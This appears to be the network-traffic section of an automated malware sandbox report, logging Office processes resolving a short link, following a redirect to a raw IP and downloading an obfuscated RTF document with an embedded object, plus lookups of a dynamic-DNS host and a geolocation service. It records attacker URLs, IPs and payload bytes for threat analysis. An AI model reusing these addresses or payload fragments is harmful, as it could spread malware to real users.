                                                    May 23, 2024 20:21:01.056195021 CEST8.8.8.8192.168.2.220x1100No error (0)qr-in.com188.114.96.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:01.056195021 CEST8.8.8.8192.168.2.220x1100No error (0)qr-in.com188.114.97.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:01.127434015 CEST8.8.8.8192.168.2.220x2664No error (0)qr-in.com188.114.96.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:01.127434015 CEST8.8.8.8192.168.2.220x2664No error (0)qr-in.com188.114.97.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:08.051455975 CEST8.8.8.8192.168.2.220xa18eNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:08.051455975 CEST8.8.8.8192.168.2.220xa18eNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:08.051455975 CEST8.8.8.8192.168.2.220xa18eNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:08.051455975 CEST8.8.8.8192.168.2.220xa18eNo error (0)dual-spov-0006.spov-dc-msedge.net150.171.41.11A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:08.051455975 CEST8.8.8.8192.168.2.220xa18eNo error (0)dual-spov-0006.spov-dc-msedge.net150.171.43.11A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:08.152309895 CEST8.8.8.8192.168.2.220xf9fbNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:08.152309895 CEST8.8.8.8192.168.2.220xf9fbNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:08.152309895 CEST8.8.8.8192.168.2.220xf9fbNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:08.152309895 CEST8.8.8.8192.168.2.220xf9fbNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:08.152309895 CEST8.8.8.8192.168.2.220xf9fbNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:08.215451956 CEST8.8.8.8192.168.2.220x3d2fNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:08.215451956 CEST8.8.8.8192.168.2.220x3d2fNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:08.215451956 CEST8.8.8.8192.168.2.220x3d2fNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:08.215451956 CEST8.8.8.8192.168.2.220x3d2fNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:08.215451956 CEST8.8.8.8192.168.2.220x3d2fNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:09.661979914 CEST8.8.8.8192.168.2.220xb9d4No error (0)f3rtrw.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:09.661979914 CEST8.8.8.8192.168.2.220xb9d4No error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:09.703577995 CEST8.8.8.8192.168.2.220x46f6No error (0)f3rtrw.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:09.703577995 CEST8.8.8.8192.168.2.220x46f6No error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                    May 23, 2024 20:21:12.678985119 CEST8.8.8.8192.168.2.220x9517No error (0)wwsaer.duckdns.org91.92.251.26A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:14.346271038 CEST8.8.8.8192.168.2.220xae70No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                    • onedrive.live.com
                                                    • qr-in.com
                                                    • 94.156.67.72
                                                    • geoplugin.net
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.2249161188.114.96.3803172C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 23, 2024 20:20:51.852160931 CEST323OUTGET /NAvSGzZ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: qr-in.com
                                                    Connection: Keep-Alive
                                                    May 23, 2024 20:20:52.967098951 CEST1159INHTTP/1.1 301 Moved Permanently
                                                    Date: Thu, 23 May 2024 18:20:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: PHPSESSID=k26rc8qnbjvktodgtgsp717o99; path=/
                                                    Set-Cookie: short_4348=1; expires=Thu, 23 May 2024 18:35:52 GMT; Max-Age=900; path=/; HttpOnly
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Robots-Tag: noindex
                                                    location: http://94.156.67.72/xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-XSS-Protection: 1; mode=block
                                                    X-Content-Type-Options: nosniff
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fhrTxWBpGAt5pV6CF6rpEDHRuPeL8WEhNnb2U2Ko7aUs0u%2BvXS%2FIMBPrMAJjXHKWUNRkZb2H%2FtAD6PxtZcyBnrKJr87iCpDZ%2BZM0i%2FsPBInM%2BIpFTAJfCDS10cU%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 88870ffbdeb77c87-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.224916294.156.67.72803172C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 23, 2024 20:20:52.989835024 CEST467OUTGET /xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 94.156.67.72
                                                    Connection: Keep-Alive
                                                    May 23, 2024 20:20:53.629616976 CEST1236INHTTP/1.1 200 OK
                                                    Date: Thu, 23 May 2024 18:20:53 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Thu, 23 May 2024 07:10:38 GMT
                                                    ETag: "913a-61919bf834b98"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 37178
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/msword
                                                    Data Raw: 7b 5c 72 74 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 66 69 6c 6c 44 7a 74 79 70 65 33 30 30 38 33 36 36 31 38 20 5c df 7d 0d 7b 5c 35 32 39 35 35 37 31 36 34 b5 21 33 26 2c 5b 39 25 2d 34 3f 7e 60 25 30 29 40 33 21 23 2e 7e 7e 30 3a 2f 3f 30 39 2f 3f 31 2e 30 24 2c 2a 3f 3f 3f 34 38 25 3a 7c 39 3b 40 40 2c 5f 7c 3c 27 25 29 2c 27 31 2b 3d 2e 36 25 24 37 b0 40 3f b0 39 38 34 3b a7 30 3e 7c a7 25 31 5e 38 5d 35 38 7e 5b 26 27 36 60 32 29 3f 36 23 3f 3d 2d 32 40 3c 3e 3b b0 5b 2a 36 27 38 2f 3a 23 35 32 2d 3a 2c 25 3b 3d 30 30 5b 3c 29 3f 3f 3f 23 3e 2d 38 27 2d 3f 23 21 a7 3c 7e 38 5d 25 2f 3f 2f 2e 7c 40 27 27 25 27 30 3f 27 39 5f 2e 24 40 36 30 b0 a7 35 3b 5b 2b 36 7c 29 60 25 5d 21 31 36 29 33 28 3f 37 26 5f 25 24 7c 27 7e 5e 3f 28 31 31 b0 2a 2f 37 34 3f 3f 25 32 23 38 25 2f 3f 7e 29 35 2c 2f 30 3f b5 35 32 3f 3f 3b 24 3e b0 5d 2b 27 3f 5e 7e 36 28 3f a7 24 38 29 2a 39 3b 3f 3e 5f 3f a7 25 33 37 3f 5b a7 35 3f 33 28 38 28 2f 7e 3a 23 32 5b 36 3f 26 2b 25 7c 3f 38 36 21 35 28 33 3f 21 [TRUNCATED]
                                                    Data Ascii: {\rt{\*\fillDztype300836618 \}{\529557164!3&,[9%-4?~`%0)@3!#.~~0:/?09/?1.0$,*???48%:|9;@@,_|<'%),'1+=.6%$7@?984;0>|%1^8]58~[&'6`2)?6#?=-2@<>;[*6'8/:#52-:,%;=00[<)???#>-8'-?#!<~8]%/?/.|@''%'0?'9_.$@605;[+6|)`%]!16)3(?7&_%$|'~^?(11*/74??%2#8%/?~)5,/0?52??;$>]+'?^~6(?$8)*9;?>_?%37?[5?3(8(/~:#2[6?&+%|?86!5(3?!8-*(5$%&-%[('%/?43-|6|/>?&??5:;'[+59&;9!>|@[(??8]]35?*??`?5+!<[%<3?~6@?89/=>(=?<+6??5~)5:*$@.~5<<:)#,1;?>($#>#4[45<~+[-:?6-<5.*??8-1%?6'=9?|!~1__7):/0'(?:(&'?]($/)7%5|+28(&/<,;?*_($84#/*7%+?8*)~$`3#,.])-3/2_?<.?%>.?.4=?%87?0[?51#_4.#^(39`@~?~~|@66=`@0%~#?)?-!7_#?$<3[%2|)<9&<??'8;%]?1?[2,'[5;5(??@[2%?=5??@*5$(!=?~!|3?~``!)?3#05.~62$?</+>.56;/<?,%;97('-8:?@2(?,>22^?732`4/[7/(%66*_=)*(]0645-6-,4`?45_|9(2$1$??4(-|#?9???:.0;:.49;|&?.6/./?[,0#-/24|%<+,=%[#5?;!?-4='-%437(&$]99[1@?.:?8?6.9'+?<5.~+?>),?(:|79@8??[51?<*9?]-;;(@&4)2/^8(]67('!9$$3:`&2~'3
                                                    May 23, 2024 20:20:53.629635096 CEST224INData Raw: 3c 3a 2a 3f 2e 2a 24 24 b0 5f 3f 3d 3f 2d 3f 3f a7 2f a7 7c 21 2a 26 31 5e 23 3c 34 39 5f 3e 35 30 3f 5e b5 3f 5f 3f 35 2c 5f 23 23 23 3b 23 5e 3a 7e 2a 32 31 40 b5 3f 3d 2d 33 40 21 23 5f 21 3a 25 3c 34 3d 38 7e 3a 7c 5d 3d 28 21 27 2d 5e b5 2f
                                                    Data Ascii: <:*?.*$$_?=?-??/|!*&1^#<49_>50?^?_?5,_###;#^:~*21@?=-3@!#_!:%<4=8~:|]=(!'-^/@.-?+%2]7]*@4~0-?00!&=)4?~`_:1:'%22#@/5<]@-%(#@0838|]0,7?,#/<-~~/*#:!/_/?6?~?4~9;5,??7-|_((?'*?'-,<3?:`(&[0`6#&?@?|>`>-_$~>|0<!,6<`
                                                    May 23, 2024 20:20:53.630474091 CEST1236INData Raw: 36 36 30 3f 26 23 38 3f 3e 37 5d 24 5b 3f 2d 32 3b 3a 5e 28 32 3f 2b 3b 5d a7 5d 3a 3d 3c 38 b0 2c 2f 3f 3b 25 30 5e 3f 30 5d 3f 7e 38 7e 30 25 36 28 2a 3d 39 3d 5f 5e 26 36 3c 3b a7 33 24 3f 25 2a 2c 2a 31 2b 3e 3e 23 3e 30 3f 2d 3c 2d 3b 5e 24
                                                    Data Ascii: 660?&#8?>7]$[?-2;:^(2?+;]]:=<8,/?;%0^?0]?~8~0%6(*=9=_^&6<;3$?%*,*1+>>#>0?-<-;^$>[3%.@&*[5[*+%6!:@&$)@9@]2`7??#*9,?+$@~&?_[:.`>&)8-??=7)26!|,%@6`'>8=_,$^2~|^+?1693/:^)_-?-?%2=16;&=*|?2+.85|(1/(<3&^+48`&=~']|%25*?8|#8=>-4??>&.(
                                                    May 23, 2024 20:20:53.630503893 CEST1236INData Raw: 3f 27 30 2a 2c 32 40 25 37 2d 5e 38 32 5d 2a 3a 3f 31 33 2a 5b 25 3b 3b 39 32 31 35 3d 28 29 37 3f 39 30 31 32 5b 7e 21 25 28 2c 3f 2c 3e 38 b0 3f 5d 3f 39 31 23 36 21 29 3f 28 2b b0 31 21 3f 5d b0 38 26 21 33 b5 37 a7 b0 3f 5e 5b 3b 21 38 24 2a
                                                    Data Ascii: ?'0*,2@%7-^82]*:?13*[%;;9215=()7?9012[~!%(,?,>8?]?91#6!)?(+1!?]8&!37?^[;!8$*:?5?,'?[1|%?;_?#7/?-9??]-_?`_<|?+#<|_9|^^*16/?7]:_4??&1?0]&'_1548?.3`3@%1*!9%1]3)?=?!~;%7^&>`.*&?'|6|@??2@?[-6?);#'&(:?/?]>!>6*?326?7]'=:](5<?%*;2+2!16|*8&
                                                    May 23, 2024 20:20:53.630515099 CEST448INData Raw: 21 23 7e 3d 31 25 3f 3b 29 40 32 a7 3f 3f 39 3f 5b 7c b5 3d 2a 29 38 30 60 2f 28 26 3d 33 3c 21 39 36 38 36 5e 5b 60 23 3b 2c 38 3d 37 36 3f 7c 37 3f 3b 29 5e 60 3a 3d b0 33 3b 2b 3f 33 3d 3b 34 3f 5d 40 a7 3f 26 35 32 3b b0 5e a7 40 60 2e 29 39
                                                    Data Ascii: !#~=1%?;)@2??9?[|=*)80`/(&=3<!9686^[`#;,8=76?|7?;)^`:=3;+?3=;4?]@?&52;^@`.)9?694`5]4`4'597!??4(?=?%3%]9.&&8.7?=[:?4|^<$%$:|3?=`[@:1+|?9&>*>'?#.1]*$0`8?8?(8@?,1'1?4%?`_9?&#?3?#?]$<9?>:_?3^+$',%>1;<@2;4`8(&/&';^?;~?;,+'$_#6;);%~$?$
                                                    May 23, 2024 20:20:53.631341934 CEST1236INData Raw: 3f 2b 3a b0 3f 3f 29 25 60 25 3f 3f 29 a7 b0 24 5e 2b 32 5d 25 34 40 5e 39 3f b0 7c 5f 24 21 3f 2f b0 23 60 26 3e 38 60 33 3f 23 2a 3f 3d 27 2e 36 27 7c 31 37 2d 32 29 32 b5 33 5e 3f 28 2b 7e 3b 36 3f 5b 30 3d b0 31 39 2b 25 32 2b 2b 21 2d 3b 3f
                                                    Data Ascii: ?+:??)%`%??)$^+2]%4@^9?|_$!?/#`&>8`3?#*?='.6'|17-2)23^?(+~;6?[0=19+%2++!-;?|@##2&<:%^~||17?].+^[?.`2=']=-'6=?:?.&9?$~=6]48)%^/7|?|:5[??!'<^~^!#:9@[?=%1>%??/@?6%!*#.?|4#<,@(>4[~`*#</'?'.[>14%2'2?_<3?>*%<;5@.5#%?4?/%!^;=!0
                                                    May 23, 2024 20:20:53.631355047 CEST1236INData Raw: 30 34 37 5c 27 ef 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                    Data Ascii: 047\'{\object\MF
                                                    May 23, 2024 20:20:53.632226944 CEST1236INData Raw: 0d 0d 0d 0a 0a 0a 0a 38 62 0d 0d 0a 0d 0a 0d 0a 0a 31 36 38 20 09 20 20 20 20 20 20 20 09 20 09 20 20 09 20 09 09 20 20 20 09 09 62 31 20 09 20 20 20 20 20 20 20 09 20 09 20 20 09 20 09 09 20 20 20 09 09 61 62 0a 0d 0a 0a 0a 0a 0a 0a 38 66 39 38
                                                    Data Ascii: 8b168 b1 ab8f98 0 1 e 0d2d 491
                                                    May 23, 2024 20:20:53.632241964 CEST1236INData Raw: 09 09 20 20 09 09 20 09 20 09 20 20 09 20 20 20 20 09 33 20 20 20 20 20 09 09 20 20 09 09 20 09 20 09 20 20 09 20 20 20 20 09 65 37 20 09 20 20 09 20 20 20 09 20 20 20 09 20 20 20 20 09 20 20 20 20 09 30 09 09 09 09 09 09 20 09 09 20 09 20 09 20
                                                    Data Ascii: 3 e7 0 6346f 8 49 05 b5cd97037f
                                                    May 23, 2024 20:20:53.632255077 CEST1236INData Raw: 0a 0d 0a 0a 0a 39 20 09 20 20 20 20 09 20 09 09 09 09 09 20 20 20 20 20 09 20 20 09 09 33 0a 0a 0d 0a 0d 0a 0a 0a 31 20 20 20 09 20 20 09 09 09 20 20 20 09 20 20 09 20 20 09 20 20 09 09 38 0d 0a 0d 0a 0d 0a 0a 0a 63 63 09 09 09 09 09 09 09 20 09
                                                    Data Ascii: 9 31 8cc c ed6 10242cfac d 44486
                                                    May 23, 2024 20:20:53.639336109 CEST1236INData Raw: 20 09 20 09 20 20 09 09 62 0d 0a 0d 0d 0d 0d 0a 0a 61 32 30 09 20 09 09 09 20 09 09 09 20 20 20 09 09 09 20 09 20 09 20 20 09 09 33 0d 0d 0a 0d 0a 0a 0d 0a 35 20 20 09 09 09 09 20 09 20 20 09 09 20 20 20 09 20 20 09 20 20 09 09 64 35 20 09 20 20
                                                    Data Ascii: ba20 35 d5 780 505d cb5994 659 7


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.2249163188.114.96.3803460C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 23, 2024 20:20:54.629136086 CEST153OUTOPTIONS / HTTP/1.1
                                                    User-Agent: Microsoft Office Protocol Discovery
                                                    Host: qr-in.com
                                                    Content-Length: 0
                                                    Connection: Keep-Alive
                                                    Cookie: short_4348=1
                                                    May 23, 2024 20:20:55.165565014 CEST742INHTTP/1.1 405 Not Allowed
                                                    Date: Thu, 23 May 2024 18:20:55 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2BT0ydQHhOG%2BCC9asQrvPDVRYrZyCowBwaH70GEG4H%2FW3TCpmqOujySCk98MAkp8cveU%2BoEdxNBF6BduQLAZo8KRZPDlIrh%2FcpDywxu2XDjE4s90HqMeEY%2FFuXw%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8887100c0a020f6c-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.2249164188.114.96.3803460C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 23, 2024 20:20:55.478600979 CEST153OUTOPTIONS / HTTP/1.1
                                                    User-Agent: Microsoft Office Protocol Discovery
                                                    Host: qr-in.com
                                                    Content-Length: 0
                                                    Connection: Keep-Alive
                                                    Cookie: short_4348=1
                                                    May 23, 2024 20:20:55.995611906 CEST743INHTTP/1.1 405 Not Allowed
                                                    Date: Thu, 23 May 2024 18:20:55 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKVfh6yQhS0l%2FR2XP33OwzJmELuG2e3GPaFVBeG9794ZQwHN6UXPK5b2lP7kPpdxHgA%2FOcdJbCwJX0YNYSeCtkao5lJmjg3belkgDjlzpf%2FfwsdNevGro%2FhdFVM%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 888710114e65184d-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0
                                                    May 23, 2024 20:20:56.004744053 CEST153OUTOPTIONS / HTTP/1.1
                                                    User-Agent: Microsoft Office Protocol Discovery
                                                    Host: qr-in.com
                                                    Content-Length: 0
                                                    Connection: Keep-Alive
                                                    Cookie: short_4348=1
                                                    May 23, 2024 20:20:56.152142048 CEST737INHTTP/1.1 405 Not Allowed
                                                    Date: Thu, 23 May 2024 18:20:56 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2BVVRPZTOClkDAfgGW40FOjS6puE35ciKgdlTn3kC30aIoSBdiHUOo1ZNxTp0pUHSMD1n5m60igouW0KRYfqP7PGfXTmLv7DXRYqMG4Ka6MCOMPmIoUi5OFKIFs%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 888710126fd0184d-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0
                                                    May 23, 2024 20:21:01.834717035 CEST158OUTHEAD /NAvSGzZ HTTP/1.1
                                                    User-Agent: Microsoft Office Existence Discovery
                                                    Host: qr-in.com
                                                    Content-Length: 0
                                                    Connection: Keep-Alive
                                                    Cookie: short_4348=1
                                                    May 23, 2024 20:21:02.435961962 CEST1030INHTTP/1.1 301 Moved Permanently
                                                    Date: Thu, 23 May 2024 18:21:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Connection: keep-alive
                                                    Set-Cookie: PHPSESSID=7si5jotrg5ah6f6mdt5lvghp91; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Robots-Tag: noindex
                                                    location: http://94.156.67.72/xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-XSS-Protection: 1; mode=block
                                                    X-Content-Type-Options: nosniff
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2FEGasLnpJnkuSosbn3EaMjSSWZJLIKxsnYEtFqHIbl6AvQVPUwHXXt2RDf9%2FGxhRkvfkun%2B838BPpOCx1c3m3FOechtagIXrFjtcfSKHR%2BjWES%2B%2BiAp9xUOlDk%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 88871036ddf8184d-EWR
                                                    alt-svc: h3=":443"; ma=86400


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.2249165188.114.96.3803460C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 23, 2024 20:20:56.359205961 CEST139OUTHEAD /NAvSGzZ HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Cookie: short_4348=1
                                                    User-Agent: Microsoft Office Existence Discovery
                                                    Host: qr-in.com
                                                    May 23, 2024 20:20:57.306442976 CEST1028INHTTP/1.1 301 Moved Permanently
                                                    Date: Thu, 23 May 2024 18:20:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Connection: keep-alive
                                                    Set-Cookie: PHPSESSID=f45es590en3dlnsssqiu87c7nm; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Robots-Tag: noindex
                                                    location: http://94.156.67.72/xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-XSS-Protection: 1; mode=block
                                                    X-Content-Type-Options: nosniff
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1qVQ6i11GQg3b2kdL8Ub7vYE%2F4GaI%2BRTPffsPZrsR2HDA0C0NthbzpQm1DmsapJEZ%2FVPmyym%2BOLdEJL4lzpWsJULQpetfEpfuOFMxcBPcyIGaNicKbFgLoi%2Fcvs%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 88871016eb3c7c90-EWR
                                                    alt-svc: h3=":443"; ma=86400


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.224916694.156.67.72803460C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 23, 2024 20:20:57.329024076 CEST283OUTHEAD /xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Cookie: short_4348=1
                                                    User-Agent: Microsoft Office Existence Discovery
                                                    Host: 94.156.67.72
